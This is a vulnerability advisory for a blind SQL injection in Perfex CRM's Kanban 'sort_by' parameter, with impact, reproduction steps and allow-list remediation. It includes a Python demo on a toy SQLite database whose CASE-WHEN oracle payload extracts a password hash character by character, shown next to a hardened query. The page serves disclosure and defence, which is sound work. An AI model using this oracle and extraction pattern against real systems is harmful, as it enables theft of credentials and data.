CodeCanyon Perfex CRM SQL Injection Vulnerability in Admin Kanban Endpoint

Vulnerability

A blind, time-based SQL injection vulnerability has been identified in CodeCanyon Perfex CRM versions through 3.4.1. The issue arises in the Admin Kanban endpoint, specifically within the AbstractKanban::applySortQuery function in application/services/AbstractKanban.php. A remote, authenticated attacker can place SQL in the 'sort_by' request parameter, which is concatenated into the query and executed by the database. Exploitation can lead to unauthorized data access, including sensitive information such as staff password hashes; a hash that can be cracked offline may then be used to gain administrative privileges.

Impact

Exploitation of this vulnerability allows an authenticated staff member to perform blind SQL injection and read arbitrary data from the application's database. This includes the bcrypt password hashes of staff accounts; a hash that belongs to a weak password can be cracked offline and then used to log in with admin rights. The injection point is the 'sort_by' parameter of the Kanban load-more endpoints, and the injected SQL is executed in a time-based manner, so data is extracted one condition at a time from response delays rather than from query output.

Reproduction

To reproduce this vulnerability, log into Perfex CRM 3.4.1 as a staff member with no administrative privileges and open the 'Leads' section, which is accessible to low-privilege staff. The 'leads_kanban_load_more' endpoint can then be exploited by injecting a SQL payload into its 'sort_by' parameter. The original report automates this with a Python script (not included on this page) that logs in as the staff member, calibrates the time-based payload, and extracts password hashes from the database.

Remediation

To address this vulnerability, update Perfex CRM to a patched version that validates the 'sort_by' parameter against a whitelist of allowed columns. Note that an ORDER BY column name is an identifier, not a value: it cannot be passed as a bound parameter, and escaping it does not make it safe. The reliable control is to accept 'sort_by' only when it exactly matches a fixed allow-list of column names (and 'ASC'/'DESC' for the direction). Any user-supplied values that reach the query layer should be passed as bound parameters rather than concatenated into SQL.
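As an added illustration (this is not Perfex CRM's code and not the reporter's script), the following Python uses an in-memory SQLite database with a constructed schema to show both halves of the description above: a sort query that concatenates a caller-controlled 'sort_by' into ORDER BY, a conditional payload that turns row order into a yes/no oracle for reading another table (a stand-in for the time-based technique the report describes, since SQLite has no SLEEP), and the allow-list check that closes the hole. The table names, columns, rows and the placeholder hash are all constructed for this example.

```python
"""Added example: unsafe ORDER BY concatenation next to its allow-listed form.

Toy schema and data constructed for this illustration; not Perfex CRM code.
"""
import sqlite3

# Assumed allow-list for the toy 'leads' table (hypothetical column set).
ALLOWED_SORT_COLUMNS = frozenset({"name", "email", "dateadded"})
ALLOWED_SORT_DIRS = frozenset({"ASC", "DESC"})

# Characters that can appear in a bcrypt string.
BCRYPT_ALPHABET = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Constructed placeholder, not a real hash.
FAKE_HASH = "$2y$10$constructedPlaceholderHashForDemoOnly"


def make_db():
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE leads (id INTEGER PRIMARY KEY, name TEXT, email TEXT, dateadded TEXT)")
    conn.executemany(
        "INSERT INTO leads (name, email, dateadded) VALUES (?, ?, ?)",
        [("Alice", "zed@example.test", "2024-01-01"),
         ("Bob", "amy@example.test", "2024-01-02"),
         ("Carol", "mike@example.test", "2024-01-03")],
    )
    conn.execute("CREATE TABLE staff (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO staff (id, email, password) VALUES (1, 'admin@example.test', ?)", (FAKE_HASH,))
    return conn


def vulnerable_sort_query(conn, sort_by, sort_dir="ASC"):
    """Unsafe: the caller-controlled sort expression is pasted straight into ORDER BY."""
    sql = f"SELECT name FROM leads ORDER BY {sort_by} {sort_dir} LIMIT 3"
    return [row[0] for row in conn.execute(sql)]


def hardened_sort_query(conn, sort_by, sort_dir="ASC"):
    """Safe: identifiers cannot be bound parameters, so compare them against a fixed allow-list."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"sort_by {sort_by!r} is not an allowed column")
    sort_dir = sort_dir.upper()
    if sort_dir not in ALLOWED_SORT_DIRS:
        raise ValueError(f"sort_dir {sort_dir!r} is not ASC or DESC")
    sql = f"SELECT name FROM leads ORDER BY {sort_by} {sort_dir} LIMIT 3"
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean oracle through the vulnerable query.

    Sorting by name puts Alice first; sorting by email puts Bob first, so the first
    row tells the attacker whether the condition held. A time-based variant would
    use a delay instead of the sort column as the observable side channel.
    """
    payload = f"(CASE WHEN ({condition}) THEN name ELSE email END)"
    rows = vulnerable_sort_query(conn, payload)
    return rows[0] == "Alice"


def extract_hash_prefix(conn, length):
    """Recover the first `length` characters of staff id 1's password hash, one character per position."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in BCRYPT_ALPHABET:
            cond = f"(SELECT substr(password, {pos}, 1) FROM staff WHERE id = 1) = '{ch}'"
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no candidate matched; stop rather than guess
    return recovered


def demo():
    """Run the oracle against the vulnerable query, then show the hardened query rejecting the payload."""
    conn = make_db()
    prefix = extract_hash_prefix(conn, 7)
    try:
        hardened_sort_query(conn, "(CASE WHEN 1=1 THEN name ELSE email END)")
        rejected = False
    except ValueError:
        rejected = True
    return prefix, rejected


if __name__ == "__main__":
    print(demo())
```

The point of the hardened version is the membership test, not any escaping: a column name that is not one of the known columns is refused outright, so there is no string left for an attacker to shape. The same check, applied to the direction keyword, keeps 'ASC'/'DESC' from becoming a second injection point.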

Added: May 5, 2026, 12:19 AM
Updated: May 5, 2026, 12:19 AM

Vulnerability Rating

Custom Algorithm

spread: 2.6
impact: 2.5
exploitability: 6.2
remediation: 0.0
relevance: 7.5
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.